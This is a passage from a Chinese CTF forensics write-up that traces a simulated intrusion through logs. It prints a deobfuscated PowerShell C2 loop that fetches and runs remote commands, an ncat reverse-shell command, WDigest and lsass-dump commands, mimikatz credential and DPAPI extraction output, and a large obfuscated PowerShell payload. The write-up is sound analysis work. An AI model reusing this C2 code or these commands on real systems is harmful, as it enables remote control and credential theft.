mAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMA
AxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAM
AA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQA
MAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADI
AYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAG
MAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiA
GQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1
ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA
0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQ
A3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZ
gA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQA
ZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADA
AZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQA1AD
EAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzA
DMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1
ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQB
iADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYg
AyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZ
gAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUA
NwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADg
AZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlAD
cAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiA
DMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABl
AGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOAB
lADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMw
AxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAM
wAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYA
YwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADM
AYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3AD
EANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhA
DQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBh
AGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQA
yAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANA
BjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZ
AAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUA
NQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226,
159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).Getn
eTwoRKCrEDEnTIAl().pASsWoRD |. ( $PsHoME[21]+$psHOme[34]+'x')
而这里的. ( $PsHoME[21]+$psHOme[34]+'x')
即为IEX,将其换成Out-String
再次运行 然后可以拿到解密,并将其格式化后
$bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101);
$bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66);
$flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99);
$s='172.21.20.96:8080';
$i='eef8efac-321d465e-e9d053a7';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/eef8efac -Headers @{
X-680d-47e8"=$i
};while ($true){
$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/321d465e -Headers @{
"X-680d-47e8"=$i}
).Content;
if ($c -ne 'None') {
$r=iex $c -ErrorAction Stop -ErrorVariable e;
$r=Out-String -InputObject $r;
$t=Invoke-WebRequest -Uri $p$s/e9d053a7 -Method POST -Headers @{
"X-680d-47e8"=$i
} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
}
sleep 0.8
}
观察到存在flag的部分
将那段代码运行即可拿到 https://pastebin.com/hVCEUK1B 再访问
PS $bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101);
PS $bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66);
PS $flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99)
PS $flag
https://pastebin.com/hVCEUK1Bidek{[email protected]_1s_3a5y_t0_d3teCt}
Resource: https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within
即可拿到flag --> idek{[email protected]_1s_3a5y_t0_d3teCt}
根据上面的线索,我们已经知道了部分消息,其中包括http://172.21.20.96/windowsupdate.ps1
不过在后续的日志检索中,我没有发现其与172.21.20.96:8080
交互后的载荷,但是该信息存在于C:/Windows/System32/winevt/logs/Microsoft-Windows-Sysmon%4Operational.evtx
检索日志定位到具体的语句
可以看出父进程是EXCEL.exe其子进程是cmd.exe,cmd的子进程为powershell的命令,符合上文所描述的xlsx配合DDE运行powershell的例子往上跟踪 发现powershell为主进程的时候 其应该后续接受了C2的相关配置 然后C2向目标机器的C:\Users\IEUser\AppData\Local\Temp\SecurityUpdate.exe
上传了一个ncat,并且通过命令"C:\Users\IEUser\AppData\Local\Temp\SecurityUpdate.exe" 172.21.20.96 4444 -e cmd.exe
反弹shell
开shell(cmd.exe)
继续向上检索,我们发现以cmd为主进程其执行了一些命令,以探测或者收集一些相关的凭据
执行whoami
:
执行arp -a
:
执行ipconfig /all
:
执行REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
准备进行dump lsass
之后应该是通过powershell上传了UpdateAgent.exe(procdump)以及mimikatz.exe到C:\Windows\System32\
下不过我没找到本地的相关日志,如果有人找到了可以告诉我一下
执行C:\Windows\System32\UpdateAgent.exe -accepteula -ma lsass.exe C:\Windows\System32\error
dump lsass.exe并将数据存在C:\Windows\System32\error.dmp
中
执行C:\Windows\System32\mimikatz.exe
由于描述中提到了本题目有两部分flag,根据思路我们要获取第一部分的flag
首先先把C:\Windows\System32\error.dmp
提取出来
下载个mimikatz https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.7z
管理员运行cmd 然后将其运行mimikatz
ps:为了方便我将error.dmp重命名为lsass.dmp然后放在与mimikatz的同目录下
mimikatz # privilege::debug
Privilege '20' OKmimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 284687 (00000000:0004580f)
Session : Interactive from 1
User Name : IEUser
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:47:38
SID : S-1-5-21-1610009768-122519599-941061767-1000
msv :
[00010000] CredentialKeys
* NTLM : 022156166aa2ab0ce4de16a45098d745
* SHA1 : ece4d499be6e18ebf42225da680e702abf639db3
[00000003] Primary
* Username : IEUser
* Domain : IEWIN7
* NTLM : 022156166aa2ab0ce4de16a45098d745
* SHA1 : ece4d499be6e18ebf42225da680e702abf639db3
tspkg :
wdigest :
* Username : IEUser
* Domain : IEWIN7
* Password : idek{crEDentia
kerberos :
* Username : IEUser
* Domain : IEWIN7
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 95278 (00000000:0001742e)
Session : Service from 0
User Name : sshd_server
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:46:44
SID : S-1-5-21-1610009768-122519599-941061767-1002
msv :
[00010000] CredentialKeys
* NTLM : 8d0a16cfc061c3359db455d00ec27035
* SHA1 : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
[00000003] Primary
* Username : sshd_server
* Domain : IEWIN7
* NTLM : 8d0a16cfc061c3359db455d00ec27035
* SHA1 : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
tspkg :
wdigest :
* Username : sshd_server
* Domain : IEWIN7
* Password : [email protected]
kerberos :
* Username : sshd_server
* Domain : IEWIN7
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : IEWIN7$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : iewin7$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 44073 (00000000:0000ac29)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : IEWIN7$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : iewin7$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
这样我们可以拿到第二个flag的第一部分idek{crEDentia
tips:这部分我个人认为存在一定的误导性,我在ticket和admin交流的时候.admin的意思是放出的流量不是解决这个题目的必须条件(虽然Note.txt中也写了,但是我似乎忘记了),但是可以帮助理解.个人认为有一定的误导性。不过在我的思维定式里这部分给了password,那可能会用到所以我这部分卡了一部分时间毕竟我在想有没有可能是一些流量的认证,但是我发现并没有.之后我找到了这个文章关于credential凭证解密https://www.cnblogs.com/Thorndike/p/15325079.html
,个人建议这里可以再优化一下以保证其可以自然 C:\Users\IEUser\AppData\Local\Microsoft\Credentials
下找到
DB79FF0C49C20D542F3690C933AC3046
提取出来
获取Credentials的GUID
mimikatz # dpapi::cred /in:DB79FF0C49C20D542F3690C933AC3046
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {9fd81d55-a794-4a77-9fdc-38eff814d2be}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data
guidMasterKey --> {9fd81d55-a794-4a77-9fdc-38eff814d2be}
导入dmp:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
获取masterkey:
mimikatz # privilege::debug
Privilege '20' OKmimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 284687 (00000000:0004580f)
Session : Interactive from 1
User Name : IEUser
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:47:38
SID : S-1-5-21-1610009768-122519599-941061767-1000
[00000000]
* GUID : {9fd81d55-a794-4a77-9fdc-38eff814d2be}
* Time : 2023/1/8 2:47:40
* MasterKey : e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
* sha1(key) : de78dc1fb05d27eddaa81f4c2143d43a9a316f1e
Authentication Id : 0 ; 95278 (00000000:0001742e)
Session : Service from 0
User Name : sshd_server
Domain : IEWIN7
Logon Server : IEWIN7
Logon Time : 2023/1/8 2:46:44
SID : S-1-5-21-1610009768-122519599-941061767-1002
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-19
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-20
Authentication Id : 0 ; 44073 (00000000:0000ac29)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : IEWIN7$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/8 2:46:43
SID : S-1-5-18
[00000000]
* GUID : {79cd7db5-e519-453b-9dc9-ad52372a33d1}
* Time : 2023/1/8 2:46:56
* MasterKey : 50f4acc588c6f7aab0902c5e638c46b3671b150abf8d55e5a5ae47c50062607e3ec383b1973bae8d9d53815e59bfe012c594a232f2788562e461c9620ae74c31
* sha1(key) : 913dba47ec0e0122494b963271da1c8a5757ef6c
[00000001]
* GUID : {f22e410f-f947-4e08-8f2a-8f65df603f8d}
* Time : 2023/1/8 2:46:43
* MasterKey : 19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
* sha1(key) : b859b2b52e7e49cf5c70069745c88853c4b23487
MasterKey --> e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
解密
mimikatz # dpapi::cred /in:DB79FF0C49C20D542F3690C933AC3046 /masterkey:e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {9fd81d55-a794-4a77-9fdc-38eff814d2be}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000030 - 48
szDescription : Local Credential Data algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : d1ae596e635002339b7dcce09f5ff6acc53b7bc9395d162ea93c328f98c31f53
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : 92e17a569f3c13606b0893c758fb9e81c1a06d2015dcebcf15107900a963ad0e
dwDataLen : 000000f0 - 240
pbData : 1413918e9f648cfb258ed6bd270360ab66d1d5e9c16580866a899184a71feb58219ade909f09184d6796ef0bd91e5091be80e76f48aa4cf7f29bfda7bb63d74e62698283cf2b6faf8ad44ddc296341acd8e61fe8cd12f2e33e8ae6bd20b328772b0816b881f21f877d8a1506fcbb06ce2b85688244b05911e97fa3f9068af0d17de3f6813cc937be00830986e93e2a467de46f11260746fe42ea38f6a20d79f1696de59efe69ead3bcb97a7ce85d45a6c78ec77bfe42b1a891175a519d37286ab3cf8a58955fdc5561f7543e6754953cce0576f58819433a47c930a31c9ad4dccf7376b1be3b00b7111ba649876b20d1
dwSignLen : 00000040 - 64
pbSign : 7f41a9469ad24a5e572c48ab6f0f1919f0a53e52963ad88676fb730aa9d6ba7e4045e5b3e45c9a33b56ca720c82d202cabd8085cabc5f3834e537ff79a987f22
Decrypting Credential:
* volatile cache: GUID:{9fd81d55-a794-4a77-9fdc-38eff814d2be};KeyHash:de78dc1fb05d27eddaa81f4c2143d43a9a316f1e;Key:available
* masterkey : e7b41c6fc2aa1edc0dc74dee160f024ff4fa026c307794c4f7739771ff60975fc7c311ab3d5346e998d61c1906a8a7b59c7c21d16910e23f4afa3959982ccccb
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000ea - 234
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 2023/1/6 15:55:10
unkFlagsOrSize : 00000040 - 64
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:target=TERMSRV/192.168.209.134
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : administrator
CredentialBlob : [email protected]_mOv3M3n7}
Attributes : 0
拿到第二个flag的第二部分 --> [email protected]_mOv3M3n7}
将二者拼接一下拿到flag2 --> idek{[email protected]_mOv3M3n7}
运行net user netadmin S3cr3tpa5sw0rD /add
不过后面似乎没有用到这个作为相关的操作,不过这个部分更像是一种RDP
的提示.当然你也可以通过流量部分找到RDP
在流量包中,我们可以得知当攻击者通过mimikatz窃取相关的凭证后,其通过rdp登录到192.168.209.147
然后再从192.168.209.147
再登录到192.168.209.134
,相关流量如下:
Security.evtx
日志中也有部分的相关信息
由于已知存在RDP,同时便可以联想到RDP缓存位图,提取这些文件后C:\Users\IEUser\AppData\Local\Microsoft\Terminal Server Client\Cache\
使用bmc-tools
即可拿到相关的数据https://github.com/ANSSI-FR/bmc-tools
python3 bmc-tools.py -s Cache0000.bin -d ./00/
python3 bmc-tools.py -s Cache0001.bin -d ./01/
python3 bmc-tools.py -s Cache0002.bin -d ./02/
然后进行拼图 可以得到
不难推测出其使用BitsTranser
模块下载dns窃密的文件并且将其加载
https://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps
下一步分析混淆的powershell脚本
https://gist.github.com/bquanman/cb6a4b2420d9f3d2f27287dcb46661d6
解密一次后得到
( ')(@'| &('%'){ ${;@!}= + $()} { ${;+} =${;@!}}{ ${~=} = ++${;@!} } {${@[}=( ${;@!} =${;@!} + ${~=})} {${~}= ( ${;@!}=${;@!}+ ${~=} ) }{${![/} = ( ${;@!}=${;@!} +${~=}) } { ${$] }= (${;@!} =${;@!}+${~=} ) } { ${]} =(${;@!} = ${;@!} + ${~=}) }{ ${](}= ( ${;@!}=${;@!}+${~=} )} { ${'$[}= ( ${;@!}=${;@!}+${~=} )}{${@$/}=( ${;@!}= ${;@!}+${~=}) } { ${)} ="[" + "$(@{} )"[ ${](} ] + "$(@{ })"[ "${~=}${@$/}" ]+"$( @{})"[ "${@[}${;+}"] + "$?"[ ${~=}] +"]"}{ ${;@!}="".("$( @{ })"["${~=}${![/}"] + "$( @{})"[ "${~=}${]}" ] + "$(@{ }) "[ ${;+} ] + "$( @{} ) "[${![/}] +"$?"[${~=} ] +"$(@{ })"[${~} ]) }{${;@!}= "$( @{}) "[ "${~=}${![/}" ]+"$(@{}) "[${![/} ]+"${;@!}"[ "${@[}${](}" ] } ) ;"${)}${~}${]}+${)}${~=}${;+}${;+}+${)}${]}${~=} +${)}${~}${![/} +${)}${![/}${@$/} +${)}${$] }${$] }+ ${)}${$] }${;+} +${)}${![/}${]}+${)}${$] }${;+}+ ${)}${![/}${@$/} +${)}${![/}${]}+${)}${$] }${;+} + ${)}${![/}${'$[}+${)}${![/}${]}+${)}${$] }${](}+${)}${$] }${![/} +${)}${~}${![/} +${)}${$] }${@$/} +${)}${~}${@[}+ ${)}${~}${]}+${)}${~=}${~=}${$] } + ${)}${]}${~=}+ ${)}${$] }${@[} + ${)}${$] }${@$/}+ ${)}${~}${@[} + ${)}${~}${]}+${)}${@$/}${'$[} +${)}${]}${~=}+ ${)}${$] }${~} + ${)}${$] }${$] } + ${)}${$] }${@$/} +${)}${~}${@[} +${)}${](}${~=}+ ${)}${~=}${;+}${~=}+ ${)}${~=}${~=}${]} +${)}${![/}${$] } +${)}${]}${](}+ ${)}${~=}${;+}${![/}+${)}${~=}${;+}${$] }+ ${)}${~=}${;+}${'$[} +${)}${~=}${;+}${;+} +${)}${](}${~} + ${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}+${)}${~=}${;+}${@$/}+ ${)}${~}${@[} + ${)}${~}${![/} +${)}${![/}${]} +${)}${~}${![/}+ ${)}${~}${@[}+ ${)}${~=}${@[}${![/}+ ${)}${~}${@[} +${)}${](}${;+}+ ${)}${~=}${~=}${~=}+${)}${~=}${~=}${![/}+${)}${~=}${;+}${~=} +${)}${@$/}${](}+${)}${@$/}${@$/}+${)}${~=}${;+}${![/}+${)}${![/}${$] }+ ${)}${](}${@$/}+${)}${@$/}${'$[} +${)}${~=}${;+}${]}+ ${)}${~=}${;+}${~=} +${)}${@$/}${@$/} + ${)}${~=}${~=}${]}+ ${)}${~}${@[} +${)}${~=}${@[}${~} + ${)}${~}${]} + ${)}${@$/}${](}+${)}${]}${~=}+ ${)}${@$/}${~=} + ${)}${'$[}${~} + ${)}${~=}${@[}${~=}+${)}${~=}${~=}${$] } + ${)}${~=}${~=}${]}+${)}${~=}${;+}${~=}+ ${)}${~=}${;+}${@$/} + ${)}${![/}${]}+${)}${]}${](}+ ${)}${~=}${~=}${~=}+ ${)}${~=}${~=}${;+}+ ${)}${~=}${~=}${'$[}+ ${)}${~=}${;+}${~=}+ ${)}${~=}${~=}${![/}+${)}${~=}${~=}${]} +${)}${@$/}${~} +${)}${$] }${'$[}+ ${)}${$] }${'$[}+ ${)}${'$[}${![/}+${)}${~=}${~=}${~=}+ ${)}${]}${]}+${)}${@$/}${](} +${)}${~=}${~=}${$] }+ ${)}${~=}${;+}${~=}+${)}${$] }${![/} + ${)}${$] }${@[}+${)}${'$[}${~} +${)}${~=}${~=}${]} + ${)}${~=}${~=}${![/}+ ${)}${~=}${;+}${$] }+${)}${~=}${~=}${;+}+ ${)}${~=}${;+}${~}+ ${)}${![/}${;+}+ ${)}${~}${]}+${)}${]}${@$/} +${)}${~=}${~=}${;+}+ ${)}${@$/}${@$/} + ${)}${![/}${]}+${)}${](}${~=} +${)}${~=}${;+}${~=} + ${)}${~=}${~=}${]} + ${)}${]}${]}+ ${)}${~=}${@[}${~=}+${)}${~=}${~=}${]}+${)}${~=}${;+}${~=} +${)}${~=}${~=}${$] }+${)}${![/}${;+} +${)}${~}${]} + ${)}${@$/}${$] } + ${)}${![/}${]}+ ${)}${](}${'$[}+ ${)}${@$/}${](} +${)}${~=}${;+}${@$/} +${)}${~=}${;+}${~=}+${)}${![/}${~=}+ ${)}${![/}${~=} +${)}${$] }${@$/}+ ${)}${~}${@[} +${)}${~}${]}+${)}${'$[}${@[}+${)}${]}${~=} + ${)}${~=}${@[}${~}+${)}${~}${]} +${)}${]}${'$[} + ${)}${![/}${![/} +${)}${~}${]} + ${)}${](}${$] } +${)}${]}${~=} +${)}${~}${]}+${)}${]}${$] }+${)}${~=}${~=}${![/} + ${)}${~=}${;+}${~} +${)}${~=}${~=}${$] }+${)}${$] }${@$/} +${)}${~}${]}+ ${)}${'$[}${~}+${)}${]}${~=}+ ${)}${![/}${'$[}+${)}${![/}${]}+ ${)}${![/}${]} + ${)}${$] }${;+} + ${)}${$] }${~} +${)}${$] }${~} +${)}${$] }${@$/} + ${)}${![/}${'$[} +${)}${![/}${]}+${)}${![/}${]} + ${)}${$] }${;+}+ ${)}${$] }${~}+ ${)}${$] }${~} +${)}${~=}${@[}${![/} +${)}${~}${](}+${)}${~=}${@[}${~} +${)}${~}${]} + ${)}${](}${![/} +${)}${]}${~=} +${)}${![/}${;+}+${)}${~}${]}+${)}${](}${![/}+${)}${![/}${~} + ${)}${~}${]} + ${)}${'$[}${~}+ ${)}${@$/}${~=}+ ${)}${~}${]}+${)}${@$/}${$] }+${)}${@$/}${~}+ ${)}${![/}${~} + ${)}${~}${]} + ${)}${](}${$] } +${)}${@$/}${~=} +${)}${~}${]} +${)}${@$/}${$] }+ ${)}${~}${](} +${)}${~}${]} + ${)}${](}${$] } + ${)}${![/}${]}+${)}${](}${]} +${)}${~=}${;+}${~=}+${)}${~=}${~=}${;+} + ${)}${~=}${;+}${~}+ ${)}${~=}${~=}${]} +${)}${~=}${;+}${![/} +${)}${@$/}${~}+${)}${![/}${~=}+ ${)}${~}${](}+${)}${$] }${;+}+${)}${$] }${~}+${)}${$] }${![/} + ${)}${$] }${@$/} + ${)}${~}${]}+${)}${'$[}${~}+ ${)}${@$/}${~=}+ ${)}${~}${]} + ${)}${@$/}${$] } +${)}${@$/}${~} + ${)}${![/}${![/} + ${)}${~}${]} +${)}${'$[}${~}+${)}${@$/}${~=} +${)}${~}${]}+ ${)}${](}${![/}+ ${)}${@$/}${~} +${)}${]}${~=}+${)}${~}${]}+ ${)}${'$[}${~}+${)}${@$/}${~=}+${)}${~}${]} + ${)}${](}${![/} +${)}${@$/}${~}+ ${)}${![/}${![/} + ${)}${~}${]} + ${)}${'$[}${~} +${)}${@$/}${~=} +${)}${~}${]} +${)}${@$/}${$] } + ${)}${@$/}${~} +${)}${~=}${@[}${$] }+${)}${$] }${@$/} + ${)}${~}${]}+ ${)}${]}${'$[}+ ${)}${~=}${@[}${![/}+${)}${~}${](} + ${)}${~=}${@[}${~} +${)}${~}${]} +${)}${](}${~}+${)}${]}${~=} +${)}${![/}${;+}+ ${)}${~}${]}+ ${)}${](}${~} + ${)}${![/}${~}+ ${)}${![/}${@$/}+ ${)}${![/}${~=} + ${)}${~}${](} +${)}${$] }${;+} +${)}${$] }${~}+${)}${$] }${![/}+ ${)}${$] }${@$/}+ ${)}${~}${]}+ ${)}${](}${@[} +${)}${]}${~=}+${)}${![/}${;+}+ ${)}${~}${]} +${)}${](}${@[}+ ${)}${![/}${~} +${)}${~}${]}+${)}${'$[}${~}+ ${)}${@$/}${~=} + ${)}${~}${]}+${)}${](}${~}+${)}${@$/}${~}+${)}${![/}${~=} + ${)}${~}${](} +${)}${$] }${;+}+ ${)}${$] }${~} + ${)}${$] }${![/} +${)}${$] }${@$/}+${)}${~}${]} +${)}${'$[}${~}+${)}${@$/}${~=}+ ${)}${~}${]} +${)}${](}${~}+${)}${@$/}${~}+${)}${![/}${![/}+ ${)}${~}${]}+ ${)}${'$[}${~}+ ${)}${@$/}${~=}+ ${)}${~}${]}+ ${)}${](}${@[} +${)}${@$/}${~} + ${)}${]}${~=} +${)}${~}${]}+${)}${'$[}${~}+ ${)}${@$/}${~=} + ${)}${~}${]}+${)}${](}${@[}+${)}${@$/}${~}+ ${)}${![/}${![/} + ${)}${~}${]}+ ${)}${'$[}${~} +${)}${@$/}${~=}+ ${)}${~}${]} + ${)}${](}${~}+${)}${@$/}${~} + ${)}${$] }${@$/} + ${)}${~}${]} + ${)}${@$/}${$] } +${)}${![/}${$] }+ ${)}${@$/}${'$[}+${)}${~=}${@[}${;+}+ ${)}${~=}${~=}${~=} + ${)}${~=}${~=}${![/}+ ${)}${~}${]}+ ${)}${'$[}${~}+${)}${@$/}${~=}+ ${)}${![/}${;+}+ ${)}${~}${]}+${)}${'$[}${~}+${)}${@$/}${~=}+ ${)}${~}${]}+ ${)}${](}${~} +${)}${@$/}${~} +${)}${![/}${~} + ${)}${~}${]}+ ${)}${'$[}${~} +${)}${@$/}${~=}+${)}${~}${]} +${)}${](}${@[}+${)}${@$/}${~} + ${)}${![/}${~=}+ ${)}${~}${](} + ${)}${$] }${;+}+ ${)}${$] }${~} + ${)}${$] }${![/} +${)}${@$/}${~}+ ${)}${~=}${@[}${$] }+ ${)}${~=}${@[}${$] }+ ${)}${$] }${@$/}+ ${)}${~}${@[} +${)}${~}${]} + ${)}${]}${@$/} +${)}${~=}${~=}${;+} + ${)}${@$/}${@$/}+ 